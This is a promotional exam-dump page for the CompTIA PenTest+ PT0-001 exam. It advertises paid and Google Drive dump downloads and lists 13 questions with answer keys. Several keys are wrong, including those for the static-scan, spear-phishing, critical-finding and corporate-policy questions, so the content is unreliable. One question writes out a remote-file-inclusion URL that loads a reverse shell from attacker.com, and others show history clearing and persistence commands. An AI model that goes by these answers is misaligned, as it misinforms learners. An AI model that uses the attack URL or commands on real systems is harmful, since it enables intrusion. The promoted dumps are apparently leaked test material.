CompTIA PenTest+

[2020] CompTIA PenTest+ Study Guide: PT0-001 Free Exam Questions & Answers

How can I get latest CompTIA PT0-001 exam Material? https://www.pass4itsure.com/pt0-001.html is a great site where you can find all types of materials related to actual problems.PT0-001 exam dumps Updated: Mar 20, 2020.

We Can Share All The New Material: Verified And Latest CompTIA PT0-001 exam dumps!

Download REAL PT0-001 PDF Dumps Training Material Now – Ensure Your Success in CompTIA Exam

PT0-001 PDF Dumps [2020.3] https://drive.google.com/open?id=1rnx8enaNWU1JZgIXdwG86OduS5MFkqEf

PT0-001 PDF Dumps https://drive.google.com/open?id=19ZoHW-TlaCOPusd6HbkE95bmX1iosjVY

Pass4itsure discount code 2020

Yes, it is true that Pass4itsure has new and up-to-date exam dumps, as it is your most reliable resource for certification exams. Now also offers an exclusive discount of 12%, don’t you act?

CompTIA PenTest+ Exam Code PT0-001

CompTIA PenTest+ is the only penetration testing exam taken at a Pearson VUE testing center with both hands-on, performance-based questions and multiple-choice, to ensure each candidate possesses the skills, knowledge, and ability to perform tasks on systems.

https://www.comptia.org/certifications/pentest

Updated CompTIA PT0-001 Questions & Answers (2020)

To get the best score on the PT0-001 exam, you need to experience the type of PT0-001 exam that will be answered and prepare the PT0-001 exam for a PT0-001 PDF dumps of each topic.

QUESTION 1
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should
the software developer perform?
A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan
Correct Answer: A

QUESTION 2
Which of the following is an example of a spear phishing attack?
A. Targeting an executive with an SMS attack
B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack
Correct Answer: A
Reference: https://www.comparitech.com/blog/information-security/spear-phishing/

QUESTION 3
A penetration tester has successfully exploited an application vulnerability and wants to remove the command history
from the Linux session. Which of the following will accomplish this successfully?
A. history –remove
B. cat history I clear
C. rm -f ./history
D. history -c
Correct Answer: D

QUESTION 4
A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester
attempt to do with these?
A. Attempt to crack the service account passwords.
B. Attempt DLL hijacking attacks.
C. Attempt to locate weak file and folder permissions.
D. Attempt privilege escalation attacks.
Correct Answer: D

QUESTION 5
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon
discovered vulnerabilities, the company asked the consultant to perform the following tasks:
Code review Updates to firewall setting
A. Scope creep
B. Post-mortem review
C. Risk acceptance
D. Threat prevention
Correct Answer: D

QUESTION 6
Given the following Python script:
#1/usr/bin/python
import socket as skt
for port in range (1,1024):
try:
sox=skt.socket(skt.AF.INET,skt.SOCK_STREAM)
sox.settimeout(1000)
sox.connect ((`127.0.0.1\\’, port))
print `%d:OPEN\\’ % (port)
sox.close
except: continue
Which of the following is where the output will go?
A. To the screen
B. To a network server
C. To a file
D. To /dev/null
Correct Answer: A

QUESTION 7
During testing, a critical vulnerability is discovered on a client\\’s core server. Which of the following should be the NEXT
action?
A. Disable the network port of the affected service.
B. Complete all findings, and then submit them to the client.
C. Promptly alert the client with details of the finding.
D. Take the target offline so it cannot be exploited by an attacker.
Correct Answer: A

QUESTION 8
During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full
administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password
have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?
A. Operating system Windows 7 Open ports: 23, 161
B. Operating system Windows Server 2016 Open ports: 53, 5900
C. Operating system Windows 8 1 Open ports 445, 3389
D. Operating system Windows 8 Open ports 514, 3389
Correct Answer: C

QUESTION 9
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is
needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used m this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
Correct Answer: B

QUESTION 10
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the
following would achieve that goal?
A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run
B. net session server | dsquery -user | net use c$
C. powershell andand set-executionpolicy unrestricted
D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg
Correct Answer: D

QUESTION 11
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist.
B. Block URL redirections.
C. Double URL encode the parameters.
D. Stop external calls from the application.
Correct Answer: B

QUESTION 12
A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities,
with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?
A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.
B. Identify the issues that can be remediated most quickly and address them first.
C. Implement the least impactful of the critical vulnerabilities\\’ remediations first, and then address other critical
vulnerabilities
D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.
Correct Answer: D

QUESTION 13
Which of the following excerpts would come from a corporate policy?
A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
B. The help desk can be reached at 800-passwd1 to perform password resets.
C. Employees must use strong passwords for accessing corporate assets.
D. The corporate systems must store passwords using the MD5 hashing algorithm.
Correct Answer: D

Features of Pass4itsure

Features of Pass4itsure

Download the new, valid, factual, verified and authentic CompTIA PT0-001 exams dumps:

Get latest CompTIA PK0-004 Free Certification Exam Material,Valid CompTIA PK0-004 Exam Dumps

PT0-001 PDF Dumps [2020.3] https://drive.google.com/open?id=1rnx8enaNWU1JZgIXdwG86OduS5MFkqEf

PT0-001 PDF Dumps https://drive.google.com/open?id=19ZoHW-TlaCOPusd6HbkE95bmX1iosjVY

Above shared the PT0-001 exam PDF & PT0-001 exam video & practice questions 2020 for free.Click the following URL and get the most updated questions: https://www.pass4itsure.com/pt0-001.html easy preparation of your CompTIA Project+ PT0-001 exam certification.